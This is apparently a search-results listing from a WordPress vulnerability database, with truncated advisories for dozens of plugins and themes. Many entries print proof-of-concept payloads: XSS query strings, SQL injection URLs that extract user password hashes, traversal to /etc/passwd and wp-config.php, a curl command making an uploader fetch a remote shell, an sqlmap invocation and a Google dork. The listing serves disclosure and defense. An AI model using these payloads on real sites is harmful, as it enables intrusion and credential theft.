4359 matches found
Loginizer 1.3.8-1.3.9 - Unauthenticated Stored Cross-Site Scripting (XSS)
Versions 1.3.8 to 1.3.9 the Loginizer WordPress Plugin were found to be vulnerable to Stored Cross-Site Scripting XSS. The vulnerability was due to the Plugin’s logging functionality using the $SERVER'REQUESTURI' PHP variable to create a URL string that was logged to the database without any inpu...
Responsive Cookie Consent <= 1.7 - Authenticated Stored Cross-Site Scripting (XSS)
A persistent cross-site scripting vulnerability has been found in the web interface of the plugin that allows the execution of arbitrary HTML/script code to be executed in the victim's browser when they visit the web site. Tested on version 1.5, 1.6 and 1.7 older versions may also be affected 1...
Pinfinity Theme <= 1.9.2 - Reflected Cross-site Scripting (XSS)
The pinfinity WordPress theme was affected by a Reflected Cross-site Scripting XSS security vulnerability. https://website.com/wp/?s=alert1...
Podlove Podcast Publisher <= 2.5.3 - Authenticated SQL Injection
During the security analysis, ThunderScan discovered SQL injection vulnerability in Podlove Podcast Publisher WordPress plugin. The easiest way to reproduce the vulnerability is to visit the provided URL while being logged in as administrator or another user that is authorized to access the plugi...
WP Support Plus Responsive Ticket System < 8.0.0 - Privilege Escalation
You can login as anyone without knowing password because of incorrect usage of wpsetauthcookie. Username:...
Ultimate Affiliate Pro WordPress Plugin <= v3.6 - Authenticated Stored XSS
Multiple Stored XSS vulnerabilities found logged as a low privileged user. Authenticated Stored XSS: Logged as an affiliate, a low privileged user. Profile Edit Account. Write the payload in the 'Last Name' input area: jaVasCript:/-///'/"/// /oNMouseoVer=alertdocument.domain Other fields may be...
All In One Schema.org Rich Snippets <= 1.4.4 - Authenticated Cross-Site Scripting (XSS)
The Schema – All In One Schema Rich Snippets WordPress plugin was affected by an Authenticated Cross-Site Scripting XSS security vulnerability. http://vulnerablesite.com/wp-admin/admin.php?page=richsnippetdashboard&bsfforcesend=true&bsfsendlabel=alert1...
Raygun4WP <= 1.8.0 - Unauthenticated Reflected XSS
The Raygun4WP WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability. http://www.example.com/wp-content/plugins/raygun4wp/sendtesterror.php?backurl="...
Stop User Enumeration 1.3.5-1.3.7 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/?author=1...
Fast Image Adder <= 1.1 - Unauthenticated Remote File Upload
The fast-image-adder WordPress plugin was affected by an Unauthenticated Remote File Upload security vulnerability. $ curl http://www.example.com/wp-content/plugins/fast-image-adder/fast-image-adder-uploader.php?confirm=url&url=http://sitewithshellstodl/shell.php Shell location is reported back t...
MDC YouTube Downloader <= 2.1.0 - Local File Inclusion
The MDC YouTube Downloader WordPress plugin was affected by a Local File Inclusion security vulnerability. http://www.example.com/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd...
Pie Register 2.0.14-2.0.15 - SQL Injection
User input is not validated correctly when accepting an Invitation Code, as such an SQL Injection attack is possible. This attack is triggered when the parameters ‘showdashwidget’ and ‘invitaioncode’ are provided to any page, by any user anonymous or otherwise. import requests,base64,re...
Fusion Engage 1.0.5 - Local File Disclosure
The fusion-engage WordPress plugin was affected by a Local File Disclosure security vulnerability. curl --data "action=fegetsvhtml&video=../wp-config.php" "http://www.example.com/wp-admin/admin-ajax.php";...
Ajax Search Pro <= 3.5 - Cross-Site Request Forgery (CSRF) Add User
The ajax-search-pro WordPress plugin was affected by a Cross-Site Request Forgery CSRF Add User security vulnerability. This will register an administrator with username "xADMIN" and password "xPASS": POST request to:...
WP Planet <= 0.1 - Unauthenticated Reflected XSS
The last time it was checked the plugin was still affected and had been closed. https://www.example.com/wp-content/plugins/wp–planet/rss.class/scripts/magpiedebug.php?url=alert1...
Realia <= 1.4 - Unauthenticated IDOR leading to Arbitrary Post Deletion
While investigating an IDOR issue on a premium theme, allowing arbitrary deletion of Ads, submitted by Vlad Vector, the Realia plugin was found to be the root cause. In fact, having this plugin installed which some themes require can allow unauthenticated attackers to delete arbitrary posts, by...
Responsive Lightbox2 < 1.0.3 - Authenticated Stored Cross-Site Scripting
The ‘hyperlink’ field in used while linking an image from a URL was found to be vulnerable to stored XSS, as they did not sanitize user given input properly before publishing the post. It is triggered when a users loads a page where the plugin shortcode is used. All WordPress websites using...
Fancy Lightbox < 1.0.2 - Authenticated Stored Cross-Site Scripting
The ‘hyperlink’ field in used while linking a remote resource Image, Video or web page from a URL was found to be vulnerable to stored XSS, as they did not sanitize user given input properly before publishing the post. It is triggered when a users loads a page where the plugin shortcode is used...
Easy Media Download < 1.1.5 - Authenticated Stored Cross-Site Scripting
The ‘Button Text’ field in used while posting a file download was found to be vulnerable to stored XSS, as they did not sanitize user given input properly before publishing the post. It is triggered when a users loads a page where the plugin shortcode is used. All WordPress websites using Easy...
Admin Menu <= 1.1 - Authenticated Cross-Site Scripting (XSS)
The Admin Menu WordPress plugin, versions 1.1 and below, were vulnerable to Authenticated Cross-Site Scripting XSS within the "role" GET parameter. http://www.example.com/wp-admin/admin.php?page=admin-menu-pro&role=alertString.fromCharCode88,83,83...
Ultimate Appointment Booking & Scheduling < 1.1.10 - Authenticated Cross-Site Scripting (XSS)
The Ultimate Appointment Booking & Scheduling WordPress plugin, versions 1.1.9 and older, were vulnerable to Authenticated Cross-Site Scripting XSS within multiple parameters...
Reality < 2.5.6 - Multiple Reflected Cross-Site Scripting (XSS)
An Unauthenticated & Authenticated Reflected XSS vulnerabilities was discovered in the Reality theme through 2.5.3 and 2.5.5 for WordPress. Unauthenticated Reflected XSS: http://reality.inwavethemes.com/properties/?status=&keyword=1%22--%3E&label=1%22--%3E%3Cimg%20src=x%20onerror=alertXSS%3E v...
Travel Booking < 2.8.4 - Unauthenticated Cross-Site Scripting (XSS)
Unauthenticated Reflected XSS via the childnumber parameter https://example.com/search-on-sidebar/?childnumber=%22%20autofocus%20%27--%3E--!%3E%3CInput/Autofocus//Onfocus=alertXSS//%3E...
Careerfy < 3.9.0 - Unauthenticated Reflected Cross-Site Scripting (XSS)
There is a XSS vulnerability in Careerfy. https://careerfy.net/demo/jobs-listing/?searchtitle=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&location=&locradius=50§orcat=...
Xenon Theme <= 1.3 - Unauthenticated Cross-Site Scripting (XSS)
The premium Xenon WordPress theme was found to be vulnerable to Unauthenticated Cross-Site Scripting XSS in the "q" parameter of the /data/typeahead-generate.php page. The affected version of the plugin was 1.3 and below, however, the vendor fixed the vulnerability but did not bump the version...
Merge + Minify + Refresh < 1.10.7 - Authenticated Arbitrary File Delete
The plugin relied on the isadmin check, without checking the user's capabilities, when deleting arbitrary files. The functionality was also vulnerable to Cross-site Request Forgery CSRF allowing attackers to delete arbitrary files by tricking authenticated users into visiting a page they...
Auth0 < 3.11.3 - Unauthenticated Reflected XSS via wle Parameter
XSS via a wle parameter associated with wp-login.php. WP/wp-login.php?wle=%22%20onEvent%3DX186697040Y2Z%20...
Registration Magic < 4.6.0.3 - Authenticated SQL Injection via Form_id
The RegistrationMagic – Custom Registration Forms and User Login WordPress plugin was affected by an Authenticated SQL Injection via Formid security vulnerability. https://example.com/wp-admin/admin.php?page=rmanalyticsshowform&rmformid=selectfromselectsleep20a&rmtr=30...
Resim Ara <= 3.0 - Unauthenticated Reflected XSS
The WordPress plugin team was notified on January 17th, 2020. Note: There were inconsistencies between the versions from the readme.txt 3.0, the plugin file 1.0 as well as tags 1.0 to 3.0...
JobMonster < 4.5.2.9 - Unauthenticated Reflected Cross-Site Scripting
In the theme JobMonster there is a XSS vulnerability as the input for the search form is provided through unsanitized GET requests. Note WPScanTeam: It's unclear which exact version fixed the issue, but the lowest we were able to test and confirm remediation was 4.5.2.9...
Sliced Invoices <= 3.8.2 - Multiple Vulnerabilities
- Unauthenticated information disclosure, allowing attackers to access arbitrary invoices and quotes containing PII - Authenticated SQL injection and information disclosure - Additional issues, such as lack of CSRF and Authorisation checks on AJAX methods used to search invoices. -...
Visualizer < 3.3.1 - Blind Server-Side Request Forgery (SSRF)
This plugin suffers from a blind SSRF vulnerability in the /wp-json/visualizer/v1/upload-data endpoint. curl -i -s -X $'POST' \ -H $'Host: 192.168.158.128:8000' \ --data-binary $'"url":"http://db:3306"' \ $'http://192.168.158.128:8000/wp-json/visualizer/v1/upload-data' See the references for...
Checklist <= 1.1.5 - Unauthenticated Reflected XSS
The fill parameter of the images/checklist-icon.php file is affected by a reflected XSS issue wp-content/plugins/checklist/images/checklist-icon.php?&fill="alert"XSS"...
My Calendar <= 3.1.9 - Unauthenticated Cross-Site Scripting (XSS)
Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site. http://www.domain.de/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm%2FOPENBUGBOUNTY%2F%3E...
File Manager < 3.0 - Authenticated Reflected Cross-Site Scripting (XSS)
Lack of sanitisation in the lang parameter in the admin dashboard could allow attacker to perform reflected XSS attacks against logged in administrators https://example.com/wp-admin/admin.php?page=wpfilemanager&lang=zhCNalertXSS...
WF Cookie Consent <= 1.1.3 - Authenticated Persistent Cross-Site Scripting (XSS)
The WF Cookie Consent WordPress plugin was affected by an Authenticated Persistent Cross-Site Scripting XSS security vulnerability. 1 Access WordPress control panel. 2 Navigate to the 'Pages'. 3 Add a new page and insert the script you wish to inject into the page title. 4 Now navigate to...
WP with Spritz 1.0 - Unauthenticated File Inclusion
The WP with Spritz WordPress plugin was affected by an Unauthenticated File Inclusion security vulnerability. http://www.example.com/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd...
WP Security Audit Log Plugin <= 3.1.1 - Sensitive Information Disclosure
No protection on the wp-content/uploads/wp-security-audit-log/ which is indexed by google and allows for attackers to possibly find user information bad login attempts Google Dork: inurl:/wp-content/uploads/wp-security-audit-log/...
WP Fastest Cache <= 0.8.7.4 - Blind SQL Injection
Improper escaping of user input when deleting the cache of specific pages leads to SQL injection vulnerability. escsql was used on input but the result was used unquoted in the constructed SQL query. Send GET request to "URL/wp-admin/admin-ajax.php?action=wpfcclearcachecolumn&id=1 PAYLOAD"...
Custom Permalinks <= 1.1 - Cross-Site Scripting (XSS)
User controllable input in the admin page of Custom Permalinks gets output without any escaping. URL/wp-admin/admin.php?page=custom-permalinks-post-permalinks&s=alert1...
AccessPress Anonymous Post Pro < 3.2.0 - Unauthenticated Arbitrary File Upload
Improper sanitization allows the attacker to override the settings for allowed file extensions and upload file size. This allows the attacker to upload anything they want, bypassing the filters. OST...
InLinks 1.0 - Authenticated SQL Injection
SQL injection is POST parameter "keyword" Affected file inlinks/inlinks.php Affected lines: 58 $Keyword = trim$POST'keyword'; 59 $URL = trim$POST'url'; 60 $Rel = trim$POST'rel'; 61 $Target = trim$POST'target'; 62 $tablename = $wpdb-prefix ."URLKeywordsMapping"; 63 $SelectKeywordURLMappingDetails ...
pootle button <= 1.1.1 - Authenticated Cross-Site Scripting (XSS)
The pootle button WordPress plugin was affected by an Authenticated Cross-Site Scripting XSS security vulnerability. http://example.com/wp-admin/admin-ajax.php?action=pbtndialog&assetsurl=%22%3E%3Cimg%20src=x%20onerror=alert1%3E...
WP Like Post <= 1.5.2 - Authenticated SQL Injection
It's possible to inject SQL via several points Client-IP Header for example when using the gslplikepost shortcode. A low-privileged account is necessary for this; subscriber is enough. Found by: Paul Dannewitz Other vulnerabilities submitted to wpvulndb:...
I Recommend This <= 3.8.1 - Authenticated SQL Injection
Plugin description: "This plugin allows your visitors to simply like/recommend your posts instead of comment on it." Active installs according to https://wordpress.org/plugins/i-recommend-this/: 40.000+ It's possible to inject SQL into the dotrecommends shortcode, if the check for IP addresses is...
Link-Library <= 5.9.13.26 – Authenticated SQL Injection
Type user access: admin user. $GET‘linkid’ is not escaped. http://localhost:8080/wp-admin/admin.php?page=link-library&genthumbsingle=1&linkid=1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,CONCATuserlogin,char58,userpass,17,18,19,20,21,22,23,24,25,26+FROM+wpusers+WHERE+ID=1...
AJAX Random Posts <= 0.3.3 - Unauthenticated PHP Object Injection
The plugin ajax-random-posts insecurely trusts serialized data submitted over HTTP requests. This opens up the site to a PHP object injection vulnerability potential exploit vector. The original researcher notified WordPress Plugins team. Attack is exploitable over AJAX calls on sites with the...
ZM Gallery 1.0 – Authenticated Blind SQL Injection
The plugin is still affected and has been closed. Type user access: admin user. $GET‘order’ is escaped wrong. Attack with Blind Injection python sqlmap.py -u "http://www.example.com/wp-admin/admin.php?page=zmgallery&orderby=name&order=desc" --dbs --cookie="cookie of admin user" --level=5...
Woo Email Control <= 1.01 - Reflected Cross-Site Scripting (XSS) & CSRF
Due to a lack of encoding and CSRF mitigation in the testemail function found on line 106 of classes/class-wooctrl.php, it is possible to automate a request to the AJAX handler for the wooctrlsendtestemail action which will reflect the specified script back to the end user...
Stream <= 3.0.5 - Unauthenticated Events Export
The Stream WordPress plugin allows unauthenticated users to export CSV or JSON of recent events. The code only checks to see if the proper GET variables are passed to a valid backend WordPress handler and will happily export logged entries. Reported to maintainers on 5/25/2016 and new version...